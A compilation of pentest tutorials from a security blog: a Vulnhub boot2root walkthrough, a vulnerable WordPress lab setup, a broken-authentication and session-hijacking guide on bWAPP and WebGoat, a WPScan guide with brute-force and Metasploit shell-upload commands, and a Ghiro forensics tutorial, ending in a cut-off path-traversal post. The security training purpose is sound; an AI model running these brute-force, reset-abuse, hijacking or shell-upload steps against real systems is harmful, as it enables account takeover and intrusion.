Today we are going to solve another boot2root challenge called “CyberSploit: 1”.  It’s available at Vulnhub for penetration testing. This is an easy level lab.  The credit for making this lab goes to cybersploit1. Let’s get started and learn how to successfully break it down. Level: Easy

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

• Netdiscover
• Nmap

Enumeration

• Gobuster

Exploiting

• Basic Cryptography
• CyberChef

Privilege Escalation

• Local Privilege Escalation ‘Overlays’
• Capture the flag

Walkthrough

Reconnaissance

As always we identify the host’s IP with the “Netdiscover” tool:

netdiscover

So, let’s start by listing all the TCP ports with nmap.

nmap –sV -sC -p- 192.168.10.190

To work more comfortably, I’ll put the IP address in /etc/hosts.

Enumeration

We access the web service and review the source code. We find the SSH user name.

It’s time to fuzzing! We used Gobuster and found several files. We examined the robots.txt and found a base64 text.

Exploiting

We use curl and add “base64 -d” to the command to decode the message in plain text. We get the first flag, the flag is the user’s password “itsskv“.

We access with the obtained credentials and read the file “flag2.txt“. Inside, we find a new code, this time it’s “binary code“.

We use the online tool “Cyberchef” and we get the second flag.

Privilege Escalation (root)

The root is quite simple (as the creator of the machine said it was easy level). The machine has a kernel vulnerable to “overlayfs: Local Privilege Escalation“. We download the exploit, compile it on the victim machine and run it. We get a root prompt and read our flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn and Twitter.

The post CyberSploit: 1 Vulnhub Walkthrough appeared first on Hacking Articles.

In this post, we will demonstrate how to set-up our own Vulnerable WordPress CMS for penetration testing on Ubuntu 20.04, Docker and Windows using XAMPP server.  

Table of Content

• WordPress Setup on Ubuntu 20.04
• Install WordPress using Docker
• Install WordPress on Windows Platform

WordPress Setup on Ubuntu 20.04

In order to configure WordPress in your Ubuntu platform, there are some prerequisites required for CMS  installation.

Prerequisites for WordPress

• Apache
• Database (MySQL/Mariadb)
• PHP

Install Apache

Let’s start the HTTP service with the help of Apache using privilege account (as root), execute the following command in the terminal.

apt install apache2

Install MySQL

For run WordPress, you will also need a database server. The database server is where WordPress content is saved. So, we are going to choose MariaDB-server as the required database for WordPress and execute the following command

apt install mariadb-server mariadb-client

Next, execute the following commands to protect remote root login for the database server.

mysql_secure_installation

Then respond to questions asked after the command has been executed.

• Enter current password for root (enter for none): press the Enter
• Set root password? [Y/n]: Y
• New password: Enter password
• Re-enter new password: Repeat password
• Remove anonymous users? [Y/n]: Y
• Disallow root login remotely? [Y/n]: Y
• Remove test database and access to it? [Y/n]: Y
• Reload privilege tables now? [Y/n]: Y

Install php

And at last, install the php php-MySQL and run the following command to install this application.

apt install php php-mysql

Create a Database for WordPress

To access the MySQL, enter the following command which will create a database for wordpress.

mysql -u root -p
CREATE DATABASE wordpress;
CREATE USER 'wp_user'@'localhost' IDENTIFIED BY 'password';
GRANT ALL ON wordpress.* TO 'wp_user'@'localhost' IDENTIFIED BY 'password';
FLUSH PRIVILEGES;
exit

WordPress Installation & Configuration

Now, its time to download and install the WordPress on our localhost, with the help of wget command we have fetched the compressed file of wordpress setup and extract the folder inside the /var/www/html directory.

cd /var/www/html
wget http://www.wordpress.org/latest.tar.gz
tar –xvf latest.tar.gz

Then run the given command to change ownership of ‘wordpress’ directory as well permission for upload directory.

chown -R www-data:www-data wordpress/
chmod -R 755  wordpress/
mkdir wordpress/wp-content/uploads
chown -R  www-data:www-data wordpress/wp-content/uploads

Now, till here we are done with the installation, to create a WordPress website we need to access the application over web browser on localhost by executing following and then complete the remaining installation process.

http://localhost/wordpress/

This will open the setup file and ask to choose your preferred language. I select English and then press the continue Tab.

Read the given content and press Let’s go to continue the activity.

To continue the activity, we need to enter the required details that will help the application to connect with database, thus it should be the same information that we have entered above at the time of database we have created for WordPress.

And if your above-given detail is correct, you will get the Installation page as we have here.

Now after that, it will ask you enter details for your Website which you want to host using WordPress CMS as shown in the below image and then finally click on install Tab.

Note: The User and Password asked before the installation is referred to your Database information, and the username and password asked after installed are referred to your application (CMS).

And once it is done, you will get application login page where you have to enter credential to access the dashboard of your CMS.

You will get the dashboard where you can write your content that to be posted on the website.

Open the wp-config.php file in wordpress directory and paste the following lines in it to access the website page.

define( 'WP_SITEURL', 'http://' .$_SERVER['HTTP_HOST'].'/wordpress');
define( 'WP_HOME', 'http://' .$_SERVER['HTTP_HOST'].'/wordpress');

And Finally, it is over here, and your WordPress is completely ready to go.

Install WordPress using Docker

Install WordPress through docker will release your effort of installing prerequisites for WordPress setup. It is a very easy and quick technique to configured WordPress. All you need to have some basic knowledge of Docker and its functionalities.

To install wordpress using docker, first, we will update the Ubuntu repository and then install the latest version of docker.io. Let’s start the installation of docker packages with the apt command as below:

apt install docker.io

Docker Compose is used to run multiple containers as a single service. Let’s begin the installation of docker-compose with the help of apt by entering the following command.

apt install docker-compose

After installing the composer for the Docker, we must create a directory by the name of WordPress. After creating the directory, we will create a .yml file that will contain the service definitions for your setup.

mkdir wordpress
cd wordpress/
nano docker-compose.yml

Now Paste the following text in the .yml and save the configuration. Source Code From here

version: '3.3'

services:
   db:
     image: mysql:5.7
     volumes:
       - db_data:/var/lib/mysql
     restart: always
     environment:
       MYSQL_ROOT_PASSWORD: somewordpress
       MYSQL_DATABASE: wordpress
       MYSQL_USER: wordpress
       MYSQL_PASSWORD: wordpress

   wordpress:
     depends_on:
       - db
     image: wordpress:latest
     ports:
       - "8000:80"
     restart: always
     environment:
       WORDPRESS_DB_HOST: db:3306
       WORDPRESS_DB_USER: wordpress
       WORDPRESS_DB_PASSWORD: wordpress
       WORDPRESS_DB_NAME: wordpress
volumes:
    db_data: {}

Now run the docker image in detach mode using the following command

docker–compose up -d

After doing all the configuration step-by-step, now access the localhost on port 8000 that will be hosting your WordPress Docker image and configure your WordPress site as done in the previous section.

You will get the dashboard where you can write your content that to be posted on the website. But here we need to make some changes inside the setting so that the wordpress after installation it will work properly. Thus, enter your localhost IP address with a port number on which your docker image is running.

And Finally, it is over here, and your WordPress is completely ready to go but over port 8000 as shown here .

Install WordPress on Windows Platform

Installation of WordPress is also very easy as compared to ubuntu because to fulfil the prerequisites of LAMP Server we can use XAMPP that will complete the all required dependency like apache and MySQL for WordPress.

Now download the extract the zip file of WordPress inside the /htdocs folder in /xampp folder in C-Drive.

Now open the PHPMYADMIN in a web browser by accessing /localhost/phpMyAdmin and create the database for WordPress to store its data.

Now in order to configure wordpress, explore the /localhost/wordpress/ and then enter the detail for the database.

Note: By Default, XAMPP DB_User is root and DB_Pass is empty <blank>

So as per XMAPP database configuration, we entered the following details in the given record.

Now again repeat the same step as done in the above section.

You will get the dashboard where you can write your content that to be posted on the website.

To make it vulnerable WordPress platform in order to perform penetration testing I have installed some vulnerable plugin as highlighted in the image.

To know how we can go do WordPress Penetration testing read this article.

WordPress Vulnerable Plugin

https://www.exploit-db.com/exploits/40290

https://www.exploit-db.com/exploits/36374

https://www.exploit-db.com/exploits/44883

Author – Paras khorwal is a Certified Ethical Hacker, Technical writer and Penetration Tester at Hacking Articles. Technology and Gadget freak. Contact Here

The post WordPress Pentest Lab Setup in Multiple Ways appeared first on Hacking Articles.

Does just keeping secure and a strong password can really protect you? Today in this article we’ll learn, how an attacker analyzes and take over the user’s account that have been logged in inside some weakly authenticated web-application with an immune password.

Table of Content

• Introduction to Authentication
•  Broken Authentication and Session Management
• Sessions
• Cookies
• Impact of Broken Authentication
• Broken Authentication
  • Credential Stuffing
  • Insecure Web-Applications
    • Insecure Login forms
    • Logout management
  • Bypassing Forget Password Option
• Improper Session Management
  • Administrative Portal Login
  • Session Hijacking
    • Using the Browser’s Plugin
    • Using Burpsuite
  • Mitigation Steps

Introduction to Authentication

Authentication is the process of validating a user who is claiming to be a genuine one. Thus in a web-application, password plays a major role in the authentication phase. In order to get the desired access, the user have to enter his username and password, further, these credentials are sent to the server for the authentication process.

However the server checks them into its database and if found valid, it generates a session and passes it to the browser in the form of Cookie Session ID.

What is Broken Authentication & Session Management 

But what if an intruder bypasses this authentication process either by guessing up the username and passwords or even by capturing up an active session of any particular user. Thus this scenario is considered as Broken Authentication where the authentication and session management of the web-applications are often not implemented correctly, leading the attacker to gain unauthorized access to the user’s data.

Form the above picture you can see that the attacker is trying to get into the web-application by the credential stuffing method, where he is having a bunch of breached passwords which thus in-turn helps him to gain an authenticated session.

 A website or application is vulnerable to Broken Authentication when:

• Username and password are easy to guess using fuzzing or brute force.
• Password Does not match Password complexity policy.
• Enumeration of username/password at the of Authentication failure response invalid username or an invalid password.

A website or application is vulnerable to Session Management when:

• Login credentials are not protected when stored and lacking hashing and salt.
• Transmission of username and password over an unencrypted channel such as HTTP
• Session ID exposes in URL.
• User session or authentication tokens are not timeouts after user logout.

In order to explore more, let’s take a deep dive and learn about the sessions and the cookies concepts.

Sessions

When a user made any changes in a web application like a sign in or sign out, the server does not know who that person is. In order to solve this issue, sessions were introduced, which holds the information of a single user that can be reused across several web pages over a particular web-application.

Example: login ID user name and password.

Therefore some code is generated with a unique identification number in the form of hash for that specific session which is a random string of 32 hexadecimal numbers such as 5f7dok65iif989fwrmn88er47gk834 and thus it is known as sessionID.

Cookies

A cookie is a small piece of data similar to the sessions, they are sent by the server to the browser. Thus this data is stored on the user’s computer while he/she is browsing. Cookies have a short time period due to their preset expiry date and time.

Cookies are classified into major categories but the most common one is –

Session Cookie:

These cookies die when the browser is closed because they are stored in the browser’s temporary memory. They’re majorly used for the e-commerce websites so the user can continue browsing without losing what he put in his cart and finally able to checkout. The session cookie is deleted only when they are on their expiration date or when a user shuts down the browser.

To know more about cookies and session management read from here

Impact of Broken Authentication

Broken Authentication is the vulnerability which allows the attacker to gain the user data without proper authentication. This vulnerability arises in the web application where the sessions are not properly sanitized. Therefore it stood as the second most critical vulnerability in the OWASP top10 having “a CVSS Score of 8.8”.

However, the Broken Authentication vulnerability has been majorly reported under

1. CWE- 287 Improper Authentication
2. CWE-345 Insufficient Verification of Data Authenticity
3. CWE-522 Insufficiently Protected Credentials

To learn more about the other CWE categories for Broken Authentication and Session Management click here.

Vulnerability Walkthrough to demonstrate Various Attack 

Until now you might be clear with the concept of authentication and aware with the fact that how crucial the sessions are. So now it’s time to exploit and analyze these vulnerabilities over the most vulnerable platforms i.e. bWapp and WebGoat.

Credential Stuffing

During the major data breaches, it is easy for the attackers to grab a list of commonly used usernames and passwords. Thus using these different login pairs, they are able to gain the actual user’s credential of a particular web-application. Credential stuffing somewhere also known as bruteforcing or fuzzing.

Therefore we’ll try to bypass this high-security captcha login using one of the best web-fuzzing tools i.e. Burpsuite.

Boot in your burpsuite in order to capture the ongoing HTTP request, by setting up the proxy server at the localhost and enabling the intercept option in the proxy tab. 

As soon as you grab the request just send it directly to the intruder.

Now it’s time to configure our attack!!

Switch to the Position tab and choose the Attack type to Cluster Bomb, further add up the attack position by simple clearing all the preset positions with the Clear $ button and adding the new positions with the Add $ button.

From the above image, you can see that, I’ve set the attack position over the login and the password fields, where my dictionaries would work. Then in the Payload section, we’ll be adding up our dictionaries.

Choose the Payload Set 1 and 2 simultaneously one after the other and include our lists in both of them by simply clicking on the Load button and at last click on Start Attack.

From the below image you can see that our attack has been started and there is a fluctuation in the length section and our lists are working in the way we want. I’ve double-clicked over the length section in order to check the lowest value first.

Here, I was able to see that the payload 1 and 2 with bee and bug inputs respectively are giving a successful login in the Response section. Therefore I was able to get into the web-application by entering the credentials as a bee : bug.

Insecure Login Forms

As mentioned above, when login credential is stored without the proper security majors being used, just like without the addition of hashing or salt value with username and password at the location where it is stored, this could be lead to insecure login that could be considered as vulnerable to session management.

Simply right-click anywhere on the form screen and choose View Page Source option.

As we analyze the HTML form code, I was able to determine the username and the password values as tonystark and I am Iron Man hidden with the white font.

Insecure Logout Management

This is one of the most common vulnerabilities, where the developers simply setup the hyperlinks of the logout page at the logout text without having any concern about the generated session and do not validate the weather the session ID is getting timeout or not once the user logout from the application. 

I’ve set the “Choose your bug” option at “Broken Authentication –Logout Management”. From the below image you can see that as I’ve clicked on the OK option in the popped up confirmation field. Thus further I had been redirected to the logout page.

Now let’s try to simply click on the back button. Great!! We are back into the account again. That means we were just redirected to the new page but our session cookies were not expired yet.

Bypassing Forget Password Option

Forget Password is the most common feature of every web-application. The majority of applications use it, in order to send a reset password link to their users at their registered email addresses. But what, if we exploit this feature and change the credentials of the users without their concern or even without capturing anything from their browsers?

Let’s try how we can exploit it!!

I’ve logged in into the WebGoat’s platform by creating a new user account as hackingarticles (Attacker) in order to exploit this vulnerability. To install and setup WebGoat click here.

Note: Here at port 8080 the  Webgoat server is enabled for HTTP service and at port 9090 the webwolf is enabled for SMTP.

From the left-hand side, the panel selects Broken Authentication following with Password Reset field. Thus selecting the 6^th option from the top, we’ll be redirected to our desired task.

Dragging to the bottom we’ll find the Account Access form, below there we can find a “forgot password” option.

As soon as we click on it we’ll be redirected to the “Forgot Your Password” page.

Now, it’s time to start our attack, I’ve entered hackingarticles@webgoat-cloud.org as the registered email address.

From the above image, you can see that we got the response as “An email has been sending to hackingarticles@webgoat-cloud.org”

Now let’s surf the WebWolf’s webpage and enter the same credentials (Attack’s) that you have used while logging into WebGoat

http://192.168.0.11:9090/login

From the below image, you can see that I’ve received an email with a reset link in order to set up the new password.

Now it’s time to break and get into the victim’s account i.e.“tom’s account” who is my target and with the help of footprinting, I have identified his email ID. Back to the WebGoat server, we’ll write the tom’s email address as tom@webgoat-cloud.org. But this time we’ll capture the request in the burpsuite before sending it to the server.

As soon as we capture the “Post Request”, we’ll send it all to the repeater.

Now we’ll manipulate the request and send it to our server i.e. the server we set at 192.168.0.11:9090.

From the above image, you can see that “An email has been send to tom@webgoat-cloud.org”. But this email has actually been sent over our WebWolf server.

Let’s get back to our “WebWolf” application and check what we have received as in our Incoming Request.

From the above image, you can see that I’ve successfully manipulated the WebGoat server, which sends the request over my account. Copy the unique Id as highlighted, which we will use in our future case.

We’re now almost done, go back to the inbox of “hackingarticles@webgoat-cloud.org” and open that reset link that we got earlier.

From the above image you can see that, in the URL section, we’re having a unique ID here too. Let’s change this unique ID with the one we copied earlier.

Woah!! We are redirected to a new “Reset your password” page, seems like we’re changing Tom’s credentials.

I’ve now set the password here as “tomandjerry”. And fired the “SAVE” button.

Let’s check whether we’re able to change the tom’s credentials or not.

Go back to the WebGoat web-application and select the option to “Account Access” and enter the following credentials:

tom@webgoat-cloud.org
tomandjerry

Great!! We’ve successfully changed Tom’s password just with his email account, without knowing who is tom.

Improper Administrative Login

Administrative logins are considered as one of the most important and the most crucial vulnerability, it occurs due to unsanitized session generated from the server’s end.

Let’s try to exploit this vulnerability and get into the web-application with the administrative privileges.

Boot back into your bWapp server and select “Session Management – Administrative Portals” in the “Choose Your Bug” option keeping the security at low.

From the above image you can see that after the “.php?” we’ve got “admin=0”, let’s manipulate this but “admin=1” and check out the grabbed result.

Simple!! We’ve unlocked this page with the administrative rights.

Let’s try to increase up the level and set it to “medium”, now checking the same in the URL, we won’t be able to find anything. So is this vulnerability patched?

Wait, let’s try to capture its cookies and analyze them.

Look there it is, the flaw is still the same, but this time it is in the cookies. So now let’s check whether our manipulation will work or not?

I’ve again manipulated the “admin=0” to “admin=1”

From the below image you can see that we’ve successfully unlocked the webpage again with some simple manipulations

Session Hijacking

Until now we all are aware with the fact that for every different user there is a unique session ID generated, thus when an attacker sniffs the network traffic via a man-in-the-middle attack or via Cross-Site Scripting and thereby steals up the session ID or the session tokens of the legitimate user’s authenticated session in order to get an unauthorized login. This methodology is known as Session Hijacking.

The idea about session hijacking would be more clear from this image.

Here the user enters his credentials into the web-application, thus application sends them to the server for authentication. Therefore as soon as the credentials were found valid, the server generates a session and shares it to the browser, such that the user does not need to enter his credentials every time for every single page he requests for.

But the attacker sniffs the network and steal up these freshly generated session IDs before they were sent to the user. Now the attacker just needs to send these session ID’s to the web server, the server tries to match them with its database stored session ID. If they both are matched thus the server servers the attacker will HTTP 200 OK reply and the attacker will get successful access without submitting proper Identification.

So it’s time to play with these sessions and hijack some accounts.

Session Hijacking using Browser’s extensions

Isn’t it great if you could simply get into other’s account without bruteforcing or resetting the password or by not finding any flaws in the web-application?

In order to perform all this, we’ll be using a simple browser extension i.e. “Cookie Editor”, which enable us to import and export the browser generated cookies by simply copying them into our clipboard, which can further be used in getting an authenticated access. 

Let’s Start!!

From the below image you can see that I’m having this Cookie Editor enabled in my browser and I’ve logged in inside bWapp as “Hackingarticles : 123”, now from the options provided I’ll click on the “Export” button in order to export all the cookies of this particular session.

Since I’ve successfully exported the user’s cookies now it’s time to import them into the attacker’s machine. From the below image you can see that the user “bee” is active with an enabled cookie editor extension.

Now let’s try to import these cookies into the attacker’s browser by pasting the exported cookies into the Cookie Editor console.

As I hit the “enter” button the exported cookies of the user hackingarticles will be imported directly into the browser where the user bee resides.

So everything is up now, just simply refresh the browser and there it goes. From the below image you can see that we’ve successfully captured the hackingarticles session with just 3 clicks.

Session ID exposure in URL

Many times the developers fail to manage the privacy of the web-applications by leaving some basic flaws such as disclosing the session ID in the URLs, which allows the attacker to steal these session ids by simply monitoring up the network and manipulate them in order to exploit the authenticated user to compromise his account.

For this exploitation, we’ll be using the bWAPP, selecting up the “Choose your bug” option to “Session Management – Session ID in URL” and setting the security level to “low”.

From the above image you can see that the “PHPSESSID=” of the user “Hackingarticles” is displayed into the browser’s URL, just copy the same into a text file.

Similarly, we’ll copy the “PHPSESSID=” from the user “Bee” and paste it into the same text file.

Form the above image, you can see that both these session ID’s are different.

Thus, it’s time to exploit this vulnerability.

In the Bee’s account, we’ll go to the “Change Password” option, and will try to change the password.

But before hitting up the “change” button, we’ll run our favourite tool “burpsuite” and capture the ongoing HTTP Request.

From the below image you can see that we’ve successfully captured the HTTP request, and there we are again presented with the “PHPSESSID”.

Now we’ll be sharing this captured request to the repeater and replace the session ID, and further will check its generated response.

From the above image, you can see that the user have been changed from bee to Hackingarticles as we hit the Send button.

We’re almost there, just change the “PHPSESSID=” with the one that we’ve used in our previous step, in the Proxy tab.

As soon as I hit the Forward button, I will be redirected to a new web page.

Great!! We are back into Hackingarticles account by simply manipulating up the SessionID.

Mitigation Steps

1. Developers should setup the Session ID’s, username, password, session tokens in the most encrypted way where they stored.
2. Validate appropriate session timeout and invalidated during logout for session tokens.
3. The client’s or the Users should use multi-factor authentication and even follow-up with the strong password policies in order to increase the password complexities.
4. Session ID’s should not be exposed in the URL.
5. Use Encrypted channel for transmitting username and password to the server.

Author: Chiragh Arora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

The post Comprehensive Guide on Broken Authentication & Session Management appeared first on Hacking Articles.

Every other web-application on the internet is somewhere or other running over a Content Management System, either they use WordPress, Squarespace, Joomla, or any other in their development phase. So is your website one of them? In this article, we’ll try to deface such WordPress websites, with one of the most powerful WordPress vulnerability Scanner i.e WPScan.

Table of Content

• Introduction
• Enumerating the WordPress web-application
  • Version Scanning
  • WordPress Themes
  • WordPress Plugins
  • WordPress Usernames
  • All in a single command
• WordPress Exploitation
  • Bruteforce Attack using WPScan
  • Shell Upload using Metasploit
  • Vulnerable Plugin exploitation
• Scanning over a Proxy Server
• Scanning with an HTTP Authentication enabled

Introduction

“WordPress is one of the most powerful CMS platform, which covers about 35% of the total share of the websites over the internet”. Thus in order to enumerate such web-applications, we’ll be using “WPScan” – which is a black box vulnerability scanner for WordPress, scripted in Ruby to focus on different vulnerabilities that are present in the WordPress applications, either in its themes or plugins.

Well, WPScan comes preinstalled in Kali Linux, SamuraiWTF, Pentoo, BlackArch; which scans up its database in order to find out the outdated versions and the vulnerabilities in the target’s web application.

Let’s check out the major things that WPScan can do for us:

• Detect the version of currently installed WordPress.
• Can detect sensitive files like readme, robots.txt, database replacing files, etc.
• Detect enabled features on currently installed WordPress server such as file_upload.
• Enumerates the themes, plugins along with their versions and tells if they are outdated or not.
• It even scans up the web-application to list out the available usernames.

Before going deeper, I suggest you check out our previous article where we’ve discussed the “Multiple ways to setup a WordPress Penetration Testing Lab”.

Let’s start!!

As discussed earlier, WPScan is installed by default in the Kali Linux machines, so let’s check out the default usage options, by simply firing the following command in the terminal.

wpscan -hh

Scanning the WordPress version of the target’s website

As we were presented with the default options, let’s now try to do a basic scan over the vulnerable WordPress web-application that we’ve set up in our earlier article.

Type the following command to scan the WordPress application and its server.

wpscan --url http://192.168.1.105/wordpress/

From the below image you can see that it dumps up everything it could – the WordPress version, the Apache server, and even it also found that the upload directory has directory listing enables which means anyone can browse to “/wp-content/uploads” in order to check out the uploaded files and contents.

Enumerating WordPress Themes

Themes play an important role in any CMS web-application, they control the general look & feel of the website including its page layout, widget locations, and the default font and colour preferences.

WPScan uses its database which contains about 2600 themes to check the vulnerable installed one over the targets. 

In order to check the installed themes of the target’s WordPress web-application, type following command:

wpscan --url http://192.168.1.105/wordpresws/ -e at

The “–e” flag is used for enumeration and the “at” flag returns “all themes”.

You can even use the other flags such as “vt”, to list only the vulnerable themes.

Thus running the above command, we will be presented with the installed themes with its version.

Enumerating WordPress Plugins

Plugins are the small piece of codes, that when added to a WordPress web-application, boost up the functionalities, and enhance the website’s features.

But these plugins may sometimes cause great damage to the web-application due to their loosely written codes.

Lets’s check out the installed plugins on our target’s web-application by executing the below command:

wpscan --url http://192.168.1.105/wordpress/ -e ap

Similar to the themes, we can also check the vulnerable plugins by using the “-vp” flag.

After waiting for a few seconds, WPScan will dump our desired result. From the below image, you can see the plugins “mail-masta” and “reflex-gallery” are installed over our target’s website. As a bonus, we even get the last update and the latest version.

Enumerating WordPress Usernames

In order to list out usernames of our target’s website privileged users, execute the following command:

wpscan –url http://192.168.1.105/wordpress/ -e u

The flag “u”  will grab all the usernames and will present a list on our screen.

As WPScan completes its work, we’ll find a list of all the users with their user IDs, in accordance with how it grabbed them.

Enumerate ALL with a single command

Does WPScan give us that privilege to scan up the web-applications to check everything in one go, whether it is its version, the installed themes, or the plugins?

Let’s check this out!

Fire up the following command to grab everything we scanned above for our target web-application.

wpscan --url http://192.168.1.105/wordpress/ -e at –e ap –e u

–e: at: enumerate all themes of targeted website

–e: ap: enumerate all plugins of targeted website

–e: u: enumerate all usernames of targeted website

Brute-force attack using WPScan

With the help of usernames which we enumerated earlier, we can create a word list of all the users and can try a brute-force login attack using the default password list as “rockyou.txt”.  You can learn more about cracking the WordPress logins from here.

From the below image you can see our designed wordlist.

Let’s now try to exploit the website by defacing its login credentials using the following command:

wpscan --url http://192.168.1.105/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txt

The –U and the –P  flags are used to set up the username list and the password list respectively.

It will start matching the valid combination of username and password and then dumps the result, from the given image you can see we found the login credentials.

Great!! We got the admin credentials as “admin : jessica”. Let’s try to get into the application’s dashboard with them.

Shell Upload using Metasploit

Isn’t it great if you get the target’s shell?

Run the following commands in order to get a meterpreter session of our target’s web-application.

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set rhosts 192.168.1.105
msf exploit(wp_admin_shell_upload) > set username admin
msf exploit(wp_admin_shell_upload) > set password jessica
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. And finally, give us the meterpreter session of the webserver.

Vulnerable Plugin Exploitation

Here in our website, we found a vulnerable plugin i.e. “slideshowgallery” which contains an authenticated file upload vulnerability thus in order to exploit it, we will be using the following module which will offer us a reverse shell.

use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery _upload) > set rhost 192.168.1.105
msf exploit(wp_ slideshowgallery _upload) > set targeturi /wordpress
msf exploit(wp_ slideshowgallery _upload) > set username admin
msf exploit(wp_ slideshowgallery _upload) > set password jessica
msf exploit(wp_ slideshowgallery _upload) > exploit

From the below image you can see that we’ve successfully captured our target’s meterpreter session.

Scanning over a Proxy Server

Is it possible to scan a WordPress web-application running over a proxy server?

Many web-applications use Proxy servers in order to be secure, but WPScan gives us this advantage to scan such web-applications using the “–proxy” flag.

Let’s check it out how:

Our WordPress web-application is now running over a proxy server with a “port number as 3128”. You can learn more about how to set up a proxy server from here.

Now if we try to scan it with the default usage option we’ll get an error and our scan will halt. So let’s try to use the proxy port in order to scan the web-application.

Simply run the following command to bypass this proxy server:

wpscan --url http://192.168.1.105/wordpress/ --proxy http://192.168.1.105:3128

From the below image you can see that we are back into the scanning section.

Scanning with an HTTP Authentication enabled

Many websites enable HTTP authentication so that they can hide some essential and critical information from unauthenticated users.

We have also set a similar validation over our website with the credentials as “raj : 123”. To learn more about HTTP authentication click here.

From the below image you can see that when we tried the normal scan, we got an alert as “Please provide it with –http-auth”.

Thus following this alert, we’ve used the –http-auth and had entered our credentials.

wpscan --url http://192.168.1.105/wordpress/ --http-auth raj:123

And there we go, our scan has been started now.

Author: Chiragh Arora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

The post WPScan:WordPress Pentesting Framework appeared first on Hacking Articles.

In this article, we will learn how we can use the Ghiro image analysis tool in forensic investigation. Ghiro is a digital image forensic tool. Which is fully automated and opensource.

Table of Content

• What is Ghiro?
• Features of Ghiro
• Setup the Ghiro
• Working on case with Ghiro

What is Ghiro?

It is developed by Alessandro Tanasi Jekil and Marco Buoncristiano Burlone. It is a fully automated tool designed to run forensic analysis over a massive amount of images, just using a user-friendly and fancy web application.

To know more about the Ghiro image analysis tool you click here.

Features of Ghiro

We can control all Ghiro features via the web interface. We can upload an image or a bunch of images to get a quick and deep overview of image analysis. We can group images in cases and search for any kind of analysis data.

The main features of Ghiro.

• Metadata Extraction: Metadata is divided into several categories depending on the standard where they are come from, Image metadata are extracted and categorized. EX- EXIF, IPTC, XMP.
• GPS Localization: It is Embedded in the image metadata sometimes there is a geotag, a bit of GPS data providing the longitude and latitude of where the photo was taken, it is read and the position is displayed on the map.
• MIME Information: The image MIME type detected to know the image type we are dealing with, in both contacted and extended form.
• ELA: ELA stands for Error Level Analysis. It identifies areas within an image that are at different compression levels. The entire picture should be at roughly the same level if a difference is detected, then it likely indicates a digital modification.
• Thumbnail Extraction: The thumbnails and data related to them are extracted from the image metadata and stored for review.
• Thumbnail Consistency: Sometimes when a photo is edited the original image is edited but the thumbnail not difference between the thumbnails and the images are detected.
• Signature Engine: They have over 120 signatures that provide evidence about the most critical data to highlight focal points and common exposures.
• Hash Matching: Suppose we are searching for an image and we have only the hash value. We can provide a list of hashes and all images matching are reported.

Setup the Ghiro

Now we need to set up our Ghiro, we recommend the “OVA” version because it is the faster way to start using the Ghiro. After downloading the Ghiro, in few minutes you will have a fully functional Ghiro set up to start to analyze our images.

To download the Ghiro image analysis tool, click here.

After opening this OVA file in Virtual Box or VMWare, It will come up as a screen like this.

It is showing us the two details

IP address: 192.168.0.7

We can use this detail to trigger our software.

Default credentials to log in Ghiro are

Username: ghiro
Password: ghiromanager

Now we open that IP address in our browser, to move further in the setup process.

Straight away we focus on the login screen and fill up its credentials. After filling up the details click on the login button.

Now, we can see that we successfully set up the Ghiro, the dashboard in the home screen says that welcome to Ghiro, Which confirms that our setup is successful.

As we can see that it has we user which user: ghiro through which we log in the software. At the initial point, it shows zero cases and zeroes analysis left because we just set up this software.

Working with Ghiro

To start working with Ghiro for image analysis we need to click on cases. Where we can see that it is completely blank, then notice a [+] to add any case to this directory.

Now, we need to fill up the details regarding the forensic case like case name, case description, and its Investigating user.

After saving the details regarding this forensic case, It will confirm these details and ask us to add images to analysis. To add images click [+] button.

To will lead us to a window through which we can add images by clicking in the add file option. Browse the file you want to analyze. After adding those files click on the start upload button.

After uploading these files it will show us the files and their status of uploading these images. In this uploading process, Ghiro demands us to refresh this screen by clicking on the highlighted refresh button. Click on the refresh button to finishing up the upload.

We can see that the file upload process in just finished now we have two options to analyze the image. The first option is directly to click on the image name to view their details.

The second option is to click on the images tab and then click on the image we want to see their details. Both of them are kind of the same it doesn’t affect the forensic investigation process.

Click on the image we want to analyze, it will show us the basic details regarding the image in the dashboard which shows us all the analysis results like static analysis, EXIF, IPTC, XMP, Signature check, etc.

Now we clicked on the second options offer by the dashboard menu which is Signature results. Which shows us all the signature matched by severity. In case 4 are low, 3 are medium and nothing is high.

In the second tab, we see static and its first option is static info. In the static info option, we see all the basic information about the image.

We switched to the second option which is FileType. Which says it is a jpeg file standard for EXIF.

The Third option shows all the Hash values of this file within different algorithms. If we Focus hard we can see that MD5 hash values are the file name, when we clicked on the image for analysis.

The fourth option which we see is Strings. It will show us all strings behind this image file with the slight details of the metadata of this image file.

The final option offered by the static is the Hex dump. It will show us the hexadecimal value of that image file through which can get some small details about that image file.

Now switch on the third tab EXIF, which has only one option which says about EXIF the metadata. We get some of the major details for our forensic investigation.

Scroll down to get full segments of the metadata of image files that can become handy in forensic investigation. Regarding GPS, Thumbnails, and IOP.

After switching the one more we found out the thumb tab. This shows us all details regarding the thumbnail of the image. Regarding Mime type, Extension, and Dimension.

The fifth tab of Ghiro image analysis we get ELA. Error Level Analysis (ELA) permits identifying areas within an image that are at different compression levels. With JPEG images, the entire picture should be at roughly the same level. If a section of the image is at a significantly different error level, then it likely indicates a digital modification.

If we focus hard and keep the brightness high we can see the Error image analysis of our image as well.

The final tab shows us the signature values in the image analysis. Which we already discussed above.

Overall Ghiro is the complete image analysis tool that can be quite beneficial in any Forensic Investigation.

Author: Shubham Sharma is a Pentester and Cybersecurity Researcher, Contact Linkedin and twitter.

The post Forensic Investigation: Ghiro for Image Analysis appeared first on Hacking Articles.

In our previous post, we’ve explained the Local File Inclusion attack in detail, which you can read from here. I recommend, then, to revisit our previous article for better understanding, before going deeper with the path traversal vulnerability implemented in this section.

Today, in this article we will explore one of the most critical vulnerabilities, that arises when the developer does not validate the inclusion functions in the web-applications, which thus allows the attacker to read and access any sensitive file from the server.

Table of Content

